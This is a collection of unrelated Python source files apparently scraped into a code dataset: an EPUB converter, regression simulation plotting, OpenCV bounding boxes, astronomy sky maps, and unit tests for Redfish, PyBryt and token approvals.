if self.dest_path.exists(): self.out_stat=self.dest_path.stat()
else: self.out_stat=None
def __eq__(self, other):
return self.in_stat.st_size==other.in_stat.st_size
def __lt__(self, other):
return self.in_stat.st_size<other.in_stat.st_size
def __bool__(self):
"""
Should this book be converted?
True if destination does not exist or if source modtime is newer.
"""
if self.out_stat is not None and self.in_stat.st_mtime<self.out_stat.st_mtime: return False
else: return True
# Increment these on successful or failed conversion respectively.
progress=0
errors=0
input_dir=Path('.')
file_format='html'
output_dir=input_dir/'html conversions'
#Since we change directories later, keep track of the current directory now so the output dir is relative to *that* instead of the input directory.
basedir=Path.cwd().resolve()
parser = argparse.ArgumentParser(description='Convert a directory of EPUB files into single HTML or text files')
parser.add_argument('-t', '--text', help='Output text files instead of HTML', action='store_true')
parser.add_argument('-i', '--input', help='Directory to search for epub files (default .)')
parser.add_argument('-o', '--output', help='output directory (default: ./[html|txt] conversions)')
args = parser.parse_args()
if args.input:
input_dir = Path(args.input)
if args.output:
output_dir = basedir/args.output
if args.text:
if not args.output:
output_dir = basedir/'txt conversions'
file_format= 'txt'
print('Converting to text files')
input_dir=input_dir.resolve()
if not output_dir.exists(): output_dir.mkdir(parents=True, exist_ok=True)
output_dir=output_dir.resolve()
def epubs(base: Path, exclude: Path=None):
"""
Recursively yields all epub files to be converted as Path instances
The only filtering done here is to avoid traversing into the directory given by exclude
"""
for item in base.iterdir():
if item.is_dir():
if exclude is not None and item.is_relative_to(exclude):
continue
else:
yield from epubs(item, exclude)
elif item.is_file() and item.suffix.lower()=='.epub':
yield item
epub_files = []
for i in epubs(input_dir, output_dir):
book=Ebook(i, file_format, input_dir, output_dir)
if bool(book): epub_files.append(book)
epub_files.sort() # smallest first
file_count=len(epub_files)
if file_count<=0:
print('All conversions are up to date.')
sys.exit()
print(f'Have {file_count} to convert')
for book in epub_files:
file=book.book_path # easier access
output_file=book.dest_path
# .parent is used because mkdir needs the path to be a directory
output_file.parent.mkdir(parents=True, exist_ok=True)
# some things to print
pretty_input_file=str(file.relative_to(input_dir))
pretty_output_file=str(output_dir.parts[-1]/output_file.relative_to(output_dir))
print(f'{progress+1}/{file_count}: Converting {pretty_input_file} to {pretty_output_file}')
conversion_result = None
convert_start = time.perf_counter_ns()
#If pandoc barfs on conversion, warn the user and skip to the next file.
try:
#This next bit of silliness is because pandoc uses 'plain' instead of 'txt' as a format name.
if args.text:
conversion_result = pypandoc.convert_file(str(file), 'plain', outputfile=str(output_file), extra_args=['-s'])
else:
conversion_result = pypandoc.convert_file(str(file), file_format, outputfile=str(output_file), extra_args=['-s'])
assert(conversion_result == '')
except RuntimeError as e:
print(f'Error converting file {file}; output is likely malformed or corrupt:\n{e.args}', file=sys.stderr)
errors+=1
convert_end = time.perf_counter_ns()
print(f'Conversion took {(convert_end - convert_start)/1000000000} seconds', file=sys.stderr)
progress+=1
if file_count>0:
print(f'{progress} converted, {errors} failed.')
|
nilq/baby-python
|
python
|
import numpy as np
import matplotlib.pyplot as plt
from solar_parallel import solar
from simulator import simul
##########################################
# define the class 'the simulation_plot' #
##########################################
'''
this class is used for plotting the result of the demonstration simulation in this folder:
Check this before you run the code:
Plz check if you have 'sci-kit learn', 'numpy', 'matplotlib' and 'tqdm' installed. If not,
1. run 'pip install scikit-learn numpy matplotlib tqdm' if you use pure Python3
2. run 'conda install scikit-learn numpy matplotlib tqdm' if you use Anaconda3
Modules:
1. from scikit-learn, we call 'LassoLarsCV' and 'LassoCV' for cv-lars-lasso and cv-cd respectively;
2. we use 'numpy' for matrix computation and random variable generation;
3. for 'simulator_ic', 'solar' and 'costcom', plz see 'simulator_ic.py', 'solar.py' and 'costcom.py' for detail;
4. 'tqdm' is used to construct the progress bar;
5. we use 'matplotlib' to plot all figures;
Inputs:
1. X and Y : the inputs and output of regression
2. sample_size : the total sample size we generate for cv-lars-lasso, cv-cd and solar
3. n_dim : the number of total variables in X
4. n_info : the number of informative variables in data-generating process
5. n_repeat : the number of subsamples in solar
6. num_rep : the number of repeatitions in Simulation 2
7. step_size : (grid search)step size for tuning the value of c for solar;
8. rnd_seed : the random seed
9. plot_on : binary, whether the plot will be saved as pdf
Outputs:
1. solar_coef : the solar regression coefficients (defined at the end of Algorithm 3);
2. opt_c : value of c* in solar;
3. test_error : the list of test errors for tuning the value of c;
4. Qc_list : the nest sets of Q(c), for all value of c from 1 to 0;
5. la_list : number of variables selected by CV-lars-lasso;
6. la_vari_list : the indices of variables selected by CV-lars-lasso;
7. cd_list : number of variables selected by CV-cd;
8. cd_vari_list : the indices of variables selected by CV-cd;
In each round of subsampling, we randomly take out 10% points out of the sample and make the rest as the subsample in this round
As competitors, we use X and Y for LassoLarsCV (called CV-lars-lasso in paper) and LassoCV (called CV-cd in paper) estimation, which relies on 10-fold CV.
'''
class one_shot_simul:
def __init__(self, sample_size, n_dim, n_info, n_repeat, step_size, rnd_seed, plot_on):
##for convinience, we define the common variable (variables we need to use for each of the following functions) in the class as follows (the common variable is defined as self.xxxx)
self.sample_size = sample_size #sample size
self.n_dim = n_dim #the number of total variables in X
self.n_info = n_info #the number of informative variables in data-generating process
self.n_repeat = n_repeat #the number of subsamples in solar
self.step_size = step_size #step size for tuning the value of c for solar;
self.rnd_seed = rnd_seed #the random seed
self.q_start = 1 #the maximum value of c in its grid search (for plotting)
self.q_end = 0.1 #the minimum value of c in its grid search (for plotting)
self.q_step = -0.02 #step size of c in its grid search (for plotting)
self.plot_on = plot_on #whether the plot will be saved as pdf
##compute solar, cv-lar-lasso and cv-cd for Demonstration Simulation in Section 3
def simul_func(self):
#1. control the random seed for reproduction
np.random.seed(self.rnd_seed)
#2. call class 'simul' from 'simulator.py' to simulate data
trial1 = simul(self.sample_size, self.n_dim, self.n_info)
#3. generate X and Y
X, Y = trial1.data_gen()
#4. call class 'solar' from 'solar.py'
trial2 = solar( X, Y, self.n_repeat, self.step_size)
#5. compute solar, cv-lar-lasso and cv-cd on X and Y
solar_coef, opt_c, test_error, Qc_list, Q_opt_c, la_list, la_vari_list, cd_list, cd_vari_list = trial2.fit()
return solar_coef, opt_c, test_error, Qc_list, la_list, la_vari_list, cd_list, cd_vari_list
##for solar, plot the corresponding test error of each value of c in its tuning (grid search)
def q_plot(self, test_error, opt_c):
#1. control which value of c we want to plot (start from q_start and end at q_end)
q_value = np.arange(self.q_start, self.q_end, self.q_step)
f1 = plt.figure()
#2. scatter plot the value of c and its corresponding test error
plt.scatter(q_value, test_error, color = 'b', label = 'the c values and their validation errors')
#3. plot a vertical line at the value of c*: max(opt_c) is because there may be multiple values assigned with the same test error
plt.axvline(max(opt_c), linewidth = 2.5, color = 'g', ls = '-.', label = 'the optimal c value')
plt.xlabel('the value of c', fontsize=16)
plt.ylabel('validation error', fontsize=16)
plt.ylim(0, 5)
plt.xlim(0.2, 1.01)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=2, shadow=True)
if self.plot_on == True:
f1.savefig("q_plot_one_shot.pdf", bbox_inches='tight')
plt.show()
##return Q(c), for all c from (start from q_start and end at q_end)
def q_list(self, Qc_list):
#1. concatenate Qc_list into a matrix
var_mark_plot = np.concatenate(Qc_list)
#2. compute the value of c for each Q(c) and the corresponding variables in each Q(c)
var_index, counts = np.unique(var_mark_plot, return_counts=True)
var_index_ordered = [x for _,x in sorted(zip(counts,var_index))]
var_plot = var_index_ordered[::-1]
cou_plot = np.sort(counts)[::-1] / ((self.q_end - self.q_start)/self.q_step)
var_plot = [ 'X' + str(i) for i in var_plot]
#3. print the list of variables with different value of c
var_loc_list = list()
var_q_list = list()
q_value_list = np.unique(cou_plot)[::-1]
i = 1
for j in q_value_list:
ans_ind = np.where([cou_plot == j])[1]
ans_var = [var_plot[i] for i in ans_ind]
var_loc_list.append(ans_ind)
var_q_list.append(ans_var)
print('q_hat value >= ',j)
print(var_q_list[:i])
i += 1
##################################
# test if this module works fine #
##################################
'''
this part is set up to test the functionability of the class above;
you can run all the codes in this file to test if the class works;
when you call the class from this file, the codes (even functions or classes) after " if __name__ == '__main__': " will be ingored
'''
if __name__ == '__main__':
sample_size = 200
n_dim = 100
n_info = 5
n_repeat = 20
step_size = -0.02
rnd_seed = 0
plot_on = False
np.random.seed(0)
#generate X and Y
trial = one_shot_simul(sample_size, n_dim, n_info, n_repeat, step_size, rnd_seed, plot_on)
#train solar
solar_coef, opt_c, test_error, Qc_list, la_list, la_vari_list, cd_list, cd_vari_list = trial.simul_func()
#plot test error of each value of c
trial.q_plot(test_error, opt_c)
#return Q(c)
trial.q_list(Qc_list)
#return variables selected by cv-lars-lasso
print('variables selected by cv-lars-lasso: ', [ 'X' + str(i) for i in la_vari_list])
#return variables selected by cv-cd
print('variables selected by cv-cd: ', [ 'X' + str(i) for i in cd_vari_list])
#return solar regression coefficients
print(solar_coef)
|
nilq/baby-python
|
python
|
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
datasets_path = ["datasets/training", "datasets/testing", "datasets/validation"]
categories = ["RAW", "FRET", "FORCE"]
def get_main_bbox(image, threshold=100):
_, image_th = cv2.threshold(image, threshold, 65535, cv2.THRESH_BINARY)
kernel = np.ones((5, 5), np.uint16)
image_closed = cv2.morphologyEx(image_th, cv2.MORPH_CLOSE, kernel)
image_opened = cv2.morphologyEx(image_closed, cv2.MORPH_OPEN, kernel)
image_opened = np.uint8(image_opened)
contours, hierarchy = cv2.findContours(
image_opened, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE
)
best_bbox = None
best_area = 0
for contour in contours:
x, y, w, h = cv2.boundingRect(contour)
if w * h > best_area:
best_area = w * h
best_bbox = (x, y, w, h)
return best_bbox
for dataset_path in datasets_path:
print(f"Generating bounding boxes in {dataset_path}")
for folder in tqdm(sorted(os.listdir(dataset_path))):
folder_path = os.path.join(dataset_path, folder)
# It must be a folder
if not os.path.isdir(folder_path):
continue
# It must end with RAW
if not folder.endswith("RAW"):
continue
# Let's find the bboxes
bbox_path = os.path.join(dataset_path, f"{folder[:-3]}_bbox.csv")
f = open(bbox_path, "w+")
f.write("filename,x,y,w,h\n")
for file in sorted(os.listdir(folder_path)):
# Reading the image
filename = os.path.join(folder_path, file)
image = cv2.imread(filename, cv2.IMREAD_UNCHANGED)
# Getting the main bouding box
bbox = get_main_bbox(image)
x, y, w, h = bbox
f.write(f"{filename},{','.join(map(str, bbox))}\n")
f.close()
|
nilq/baby-python
|
python
|
"""
Manage generation of maps from HEALpix tables
$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/pipeline/pub/display_map.py,v 1.3 2011/06/24 04:53:06 burnett Exp $
"""
import os,sys, types, pickle
import numpy as np
import pylab as plt
from uw.utilities import image
from skymaps import Band, SkyDir, PySkyFunction, Hep3Vector, SkyImage
def skyplot(crec, title='', axes=None, fignum=30, ait_kw={}, **kwargs):
""" make an AIT skyplot of a HEALpix array
crec : array
must be sorted according to the HEALpix index
title : string
set the figure title
ait_kw : dict
to set kwargs for image.AIT, perhaps pixelsize
Other args passed to imshow
"""
n = len(crec)
nside = int(np.sqrt(n/12))
assert n==12*nside**2, 'wrong length to be healpix array'
band = Band(nside)
def skyplotfun(v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
index = band.index(skydir)
return crec[index]
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum, figsize=(12,6))
ait=image.AIT(PySkyFunction(skyplotfun) ,axes=axes, **ait_kw)
ait.imshow(title=title, **kwargs)
return ait
class DisplayMap(object):
""" display the contents of a HEALpix table as ait or zea
"""
def __init__(self, table,
sources=None,
imshow_kw=dict(interpolation='bilinear', ),
**kwargs):
"""table : string or iterable
If a string, the name of a pickled file
sources : None or a string
if a string, the name of a pickled rec with name, ra, dec fields
"""
if type(table)==types.StringType:
self.v = pickle.load(open(table))
print ('Loaded HEALpix table from file %s' %table)
else: self.v=table
self.nside = int(np.sqrt(len(self.v)/12))
assert len(self.v)==12*self.nside**2, 'size of map not consistent with expected nside %d' % nside
self.band = Band(self.nside)
self.imshow_kw=imshow_kw
self.scale = kwargs.pop('scale', lambda x: x)
if type(self.scale) == types.StringTypes:
if self.scale=='sqrt': self.scale= lambda x: np.sqrt(max(x,0))
elif self.scale=='log': self.scale=lambda x: np.log10(max(x,0.1))
else:
raise Exception('unrecognized scale function, %s' %self.scale)
self.ZEA_kw = kwargs.pop('ZEA_kw', dict(galactic=True, size=10, pixelsize=0.1))
if sources is not None:
self.sources = pickle.load(open(sources))
print ('loaded %d sources from %s' % (len(self.sources),sources))
else:self.sources=None
self.map_path = kwargs.pop('map_path',None)
def get_pyskyfun(self):
return PySkyFunction(self)
def skyfun(self, v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
return self.v[self.band.index(skydir)]
def __call__(self,v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
t =self.v[self.band.index(skydir)]
return self.scale(t)
def fill_ait(self, fignum=11, axes=None, show_kw={}, source_kw={}, figwidth=12, margin=0.15, **kwargs):
if axes is None:
# set up a figure for 2x1 image with equal margins
plt.close(fignum)
figheight = figwidth*(1.+2*margin)/(1+margin)/2.
fig=plt.figure(fignum, figsize=(figwidth, figheight));
axes=plt.gca()
plt.subplots_adjust(left=0.05, right=0.95) #gives reasonable equal margins
pixelsize = kwargs.pop('pixelsize', 0.25)
ait = image.AIT(self.get_pyskyfun(),axes=axes, pixelsize=pixelsize, **kwargs)
self.imgplot=ait.imshow(**show_kw)
ait.axes.set_autoscale_on(False)
if self.sources is not None:
sdirs = map(SkyDir, self.sources.ra, self.sources.dec)
ait.plot(sdirs, **source_kw)
print ('found %d sources to plot' % len(sdirs) )
plt.draw_if_interactive()
return ait
def fill_zea(self, index, fignum=12, axes=None, show_kw=None, **kwargs):
""" index: integer, or a SkyDir
the HP12 index if integer
figmun: integer
used if axes is None
show_kw : dict
override imshow keywords
kwargs
size
pixelsize
galactic
"""
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum,figsize=(6,6));
axes = fig.gca()
if type(index) == types.IntType:
sdir = Band(12).dir(index)
title = 'HP12_%4d'%index
else:
sdir = index
title = 'l = %.1f, b=%.1f' % (sdir.l(), sdir.b())
title = kwargs.pop('title',title)
kw = self.ZEA_kw
kw.update(kwargs)
zea = image.ZEA(sdir, **kw)
zea.grid()
zea.fill(self.get_pyskyfun())
zea.imshow( **(show_kw if show_kw is not None else self.imshow_kw))
zea.colorbar()
if title is not None: axes.set_title(title)
if self.sources is not None:
count = 0
for s in self.sources:
sdir = SkyDir(s.ra,s.dec)
if not zea.inside(sdir):continue
count += 1
inside =self.band.index(sdir)==index
zea.plot_source(s.name, sdir, symbol='*' if inside else 'd',
markersize=14 if inside else 8,
color='w')
print ('found %d sources to plot' %count )
if self.map_path is not None:
fout = os.path.join(self.map_path,hpname(index)+'.png')
plt.savefig(fout, bbox_inches='tight')
print ('saved figure to %s' % fout)
plt.draw_if_interactive()
return zea
class SourceDensity(object):
""" create source density HEALpix array from a list of locations
"""
def __init__(self, nside=12):
"""
nside: integer
the HEALpix nside parameter
"""
self.v = np.zeros(12*nside**2, float)
self.index = Band(nside).index
def fill(self, sdirs):
""" sdirs: a list of SkyDir objects
"""
for s in sdirs:
self.v[self.index(s)]+=1
def fill_rec(self, rec, cut=None):
""" rec: a recarry with ra, dec columns
cut : None or a mask arrray
"""
if cut is None:
sdirs = map(SkyDir, rec.ra, rec.dec)
else:
sdirs = map(SkyDir, rec.ra[cut], rec.dec[cut])
self.fill(sdirs)
def save(self, fn):
pickle.dump(self.v, open(fn, 'wb'))
print ('saved file %s' % fn)
class SourceMap(DisplayMap):
""" subclass of DisplayMap to display point source positions on a photon density map
"""
def __init__(self, kde,
sources ,
show_kw=dict(fun = lambda x:np.sqrt(x/1e6), vmax=4, cmap='hot'),
plot_kw=dict(nocolorbar=False,),
pos=None, size=180,
):
super(SourceMap,self).__init__(kde)
if type(sources) == types.StringType:
self.s = pickle.load(sources)
print ('loaded %5d sources from %s' %(len(self.s), fn))
else: self.s = sources
self.show_kw = show_kw
def fill_ait(self, fignum=20, axes=None, **kwargs):
ait = super(SourceMap, self).fill_ait( fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
ait.axes.set_autoscale_on(False) # prevent rescaling when adding points
self.ait=ait
return ait
def fill_zea(self, pos, fignum=21, axes=None, which=-1, savefn=None, **kwargs):
sfactor = kwargs.pop('sfactor', 1)
zea = super(DMap, self).fill_zea(pos, fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
s = self.s
for subset, marker, color, size, label in self.subsets(s, which):
zea.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print ('plotted %4d sources, subset "%s"' %(sum(subset), label))
plt.legend(scatterpoints=1, loc=2)
if savefn is not None:
self.savefig(savefn % i); i+=1
return zea
def legend(self):
plt.legend(frameon=False,scatterpoints=1, loc=(-0.05,-0.05))
def savefig(self, fn):
plt.savefig(fn, bbox_inches='tight', pad_inches=0, dpi=160)
def subsets(self, s, which):
assoc = s.id_prob>0.8
ts25=s.ts>=25
lt25=(s.ts<25)
t =(((-assoc)*(lt25),'+', 'grey', 8, 'no id, TS<25'),
((-assoc)*(ts25), 's', 'red', 10, 'no id, TS>25'),
(assoc, 'o', 'green', 12, 'associated' ),
)
return t if which <0 else (t[which],)
def add_sources(self, which=-1, sfactor=1):
s = self.s
print ('loaded %5d sources' %(len(s),))
i=0 if which<0 else which+10
plt.rcParams['legend.fontsize']= 8.0
for subset, marker, color, size, label in self.subsets(s, which):
self.ait.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print ('plotted %4d sources, subset "%s"' %(sum(subset), label))
self.legend()
def load_skyspect(fn = r'T:\data\galprop\ring_21month_P6v11.fits',
# r'D:\fermi\data\galprop\gll_iem_v02.fit',
nside=192,
show_kw = dict(fun=np.log10, cmap='hot'),
):
"""
load a galactic diffuse distribution.
Save the HEALpix respresentation at an energy (1 GeV default)
fn : string
filename for the FITS representaion of a SKySpectrum
nside: int
HEALpix nside to use for represenation -- note that 192 is 12*16, about 0.25 deg
show_kw : dict
fun: weighting function, cmap, vmin, vmax
"""
t = SkyImage(fn)
galname = os.path.split(fn)[-1]
print ('%s: nx, ny, layers: %d %d %d' %(galname, t.naxis1(), t.naxis2(), t.layers()))
hpdir = Band(nside).dir
dmap = map(lambda i:t(hpdir(i)), xrange(12*nside**2))
tdm=DisplayMap(dmap)
tdm.fill_ait(fignum=12, source_kw=dict(edgecolor='w',), show_kw=show_kw )
plt.title(galname+' (1 GeV)')
sfn = galname.split('.')[0]+'.png'
plt.savefig(galname.split('.')[0]+'.png', bbox_inches='tight', pad_inches=0)
print ('saved figure to %s' % sfn)
return tdm
|
nilq/baby-python
|
python
|
# Copyright 2019 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import mock
from sdflexutils.redfish import main
from sdflexutils.redfish.resources.system import system
from sdflexutils.redfish.resources import update_service
from sushy import connector as sushy_connector
import testtools
class HPESushyTestCase(testtools.TestCase):
@mock.patch.object(sushy_connector, 'Connector', autospec=True)
def setUp(self, mock_connector):
super(HPESushyTestCase, self).setUp()
self.conn = mock.Mock()
mock_connector.return_value = self.conn
with open('sdflexutils/tests/unit/redfish/'
'json_samples/root.json', 'r') as f:
self.conn.get.return_value.json.return_value = (json.load(f))
self.hpe_sushy = main.HPESushy('https://1.2.3.4',
username='foo', password='bar',
verify=True)
mock_connector.assert_called_once_with(
'https://1.2.3.4', verify=True)
def test__init_throws_exception(self):
self.assertRaises(
ValueError, main.HPESushy, 'https://1.2.3.4',
'foo', 'bar', auth=mock.MagicMock())
@mock.patch.object(system, 'HPESystem', autospec=True)
def test_get_system(self, mock_system):
sys_inst = self.hpe_sushy.get_system('1234')
self.assertIsInstance(sys_inst,
system.HPESystem.__class__)
mock_system.assert_called_once_with(self.hpe_sushy._conn,
'1234',
self.hpe_sushy.redfish_version)
@mock.patch.object(update_service, 'HPEUpdateService', autospec=True)
def test_get_update_service_ah(self, mock_update_service):
self.hpe_sushy._get_action_list = mock.Mock()
self.hpe_sushy._get_action_list.return_value = [
'Oem', 'Hpe', '#SDFlexUpdateService.UpdateAll']
us_inst = self.hpe_sushy.get_update_service()
self.assertIsInstance(us_inst,
update_service.HPEUpdateService.__class__)
mock_update_service.assert_called_once_with(
self.hpe_sushy._conn, "/redfish/v1/UpdateService",
redfish_version=self.hpe_sushy.redfish_version)
@mock.patch.object(update_service, 'HPEUpdateService', autospec=True)
def test_get_update_service_ch(self, mock_update_service):
self.hpe_sushy._get_action_list = mock.Mock()
self.hpe_sushy._get_action_list.return_value = ['Oem',
'#SD.UpdateAll']
us_inst = self.hpe_sushy.get_update_service()
self.assertIsInstance(us_inst,
update_service.HPEUpdateService.__class__)
mock_update_service.assert_called_once_with(
self.hpe_sushy._conn, "/redfish/v1/UpdateService",
redfish_version=self.hpe_sushy.redfish_version)
def test__get_action_list_ah(self):
with open('sdflexutils/tests/unit/redfish/'
'json_samples/update_service_ah.json', 'r') as f:
ret_mock = mock.Mock()
ret_mock.content = (f.read()).encode('ascii')
self.hpe_sushy._conn.get.return_value = ret_mock
self.assertEqual(
self.hpe_sushy._get_action_list("/redfish/v1/UpdateService"),
['Oem', 'Hpe', '#SDFlexUpdateService.UpdateAll'])
def test__get_action_list_ch(self):
with open('sdflexutils/tests/unit/redfish/'
'json_samples/update_service_ch.json', 'r') as f:
ret_mock = mock.Mock()
ret_mock.content = (f.read()).encode('ascii')
self.hpe_sushy._conn.get.return_value = ret_mock
self.assertEqual(
self.hpe_sushy._get_action_list("/redfish/v1/UpdateService"),
['Oem', '#SD.UpdateAll'])
|
nilq/baby-python
|
python
|
"""
Tests for PyBryt annotations
"""
import time
import numpy as np
from collections.abc import Iterable
from functools import lru_cache
from pybryt import Value
from pybryt.utils import pickle_and_hash
START_TIMESTAMP = 1614904732.51892
@lru_cache(1)
def generate_memory_footprint():
"""
"""
np.random.seed(42)
return [
(np.random.uniform(-100, 100, size=(100, 100)), time.time()),
(4.0, time.time()),
(list(range(100))[::-1], time.time()),
(1, time.time()),
(np.e, time.time()),
(None, time.time()),
(None, time.time()),
(np.random.normal(size=102), time.time()),
(4.0, time.time()),
]
def test_value_annotation():
"""
"""
mfp = generate_memory_footprint()
seen = {}
for val, ts in mfp:
v = Value(val)
res = v.check(mfp)
h = pickle_and_hash(val)
# check attributes of values and results
assert len(v.children) == 0, "Value annotation has children"
assert res.satisfied is True, "Did not find value in memory footprint"
assert res._satisfied is True, "Did not find value in memory footprint"
assert res.annotation is v, "Wrong annotation in result"
assert res.children is None, "Value annotation result has children"
if h in seen:
# check that we get the earliest timestamp for duplicate values
assert np.isclose(res.timestamp, seen[h]), \
"Wrong timestamp for duplicate value in value annotation result"
else:
assert np.isclose(res.timestamp, ts), "Wrong timestamp in value annotation result"
if isinstance(val, Iterable) and hasattr(val, "all"): # for numpy arrays
assert (res.value == val).all(), "Wrong value in value annotation result"
else:
assert res.value == val, "Wrong value in value annotation result"
if h not in seen:
seen[h] = ts
v = Value(-1) # does not occur in mfp
res = v.check(mfp)
# check attributes of values and results
assert len(v.children) == 0, "Value annotation has children"
assert res.satisfied is False, "Did not find value in memory footprint"
assert res._satisfied is False, "Did not find value in memory footprint"
assert res.annotation is v, "Wrong annotation in result"
assert res.children is None, "Value annotation result has children"
assert res.timestamp == -1, "Wrong timestamp in value annotation result"
assert res.value is None, "Wrong value in value annotation result"
|
nilq/baby-python
|
python
|
""" Exteneral Device Specifications Sub-package """
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
from .devcore import *
from . import ibmq_burlington
from . import ibmq_essex
from . import ibmq_london
from . import ibmq_melbourne
from . import ibmq_ourense
from . import ibmq_rueschlikon
from . import ibmq_tenerife
from . import ibmq_vigo
from . import ibmq_yorktown
from . import rigetti_agave
from . import rigetti_aspen4
from . import rigetti_aspen6
from . import rigetti_aspen7
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""The Software is provided to you by the Licensor under the License, as
defined below, subject to the following condition.
Without limiting other conditions in the License, the grant of rights under
the License will not include, and the License does not grant to you, the
right to Sell the Software.
For purposes of the foregoing, “Sell” means practicing any or all of the
rights granted to you under the License to provide to third parties, for a
fee or other consideration (including without limitation fees for hosting
or consulting/ support services related to the Software), a product or
service whose value derives, entirely or substantially, from the
functionality of the Software. Any license notice or attribution required
by the License must also include this Commons Clause License Condition
notice.
Software: WAVE Observation Framework
License: Apache 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt
Licensor: Consumer Technology Association
Contributor: Eurofins Digital Product Testing UK Limited
"""
|
nilq/baby-python
|
python
|
import os
import json
pathToFolder = "c:/Users/dilGoe/Desktop/Praktikum/django"
pathToFile = "c:/Users/dilGoe/Desktop/Praktikum/django/LICENSE"
def getCorpusFolder(pathToFolder=pathToFolder):
resultDictJSON = {}
for (dirpath, dirname, filename) in os.walk(pathToFolder):
for file in filename:
filePath = os.path.join(dirpath, file)
file1 = open(filePath, "rb")
file2 = file1.read().decode('utf-8', errors='replace').splitlines()
resultDictJSON[filePath] = []
for content in file2:
resultDictJSON[filePath].append(content)
return resultDictJSON
def getCorpusOneFile(filepath=pathToFile):
resultList = []
file1 = open(filepath, "rb")
file2 = file1.read().decode('utf-8', errors='replace').splitlines()
for content in file2:
if content:
resultList.append(content)
content = file1.readline().decode('utf-8', errors='replace')
return resultList
def main():
print(getCorpusOneFile())
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
"""Approval race condition mitigation."""
from web3.contract import Contract
def test_increase_approval(released_token: Contract, customer: str, empty_address: str, allowed_party):
"""Increase approval."""
token = released_token
amount = 5000
change = 1000
assert token.call().allowance(customer, allowed_party) == 0
token.transact({"from": customer}).approve(allowed_party, amount)
token.transact({"from": customer}).addApproval(allowed_party, change)
assert token.call().allowance(customer, allowed_party) == amount + change
def test_decrease_approval(released_token: Contract, customer: str, empty_address: str, allowed_party):
"""Decrease approval."""
token = released_token
amount = 5000
change = 1000
assert token.call().allowance(customer, allowed_party) == 0
token.transact({"from": customer}).approve(allowed_party, amount)
token.transact({"from": customer}).subApproval(allowed_party, change)
assert token.call().allowance(customer, allowed_party) == amount - change
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.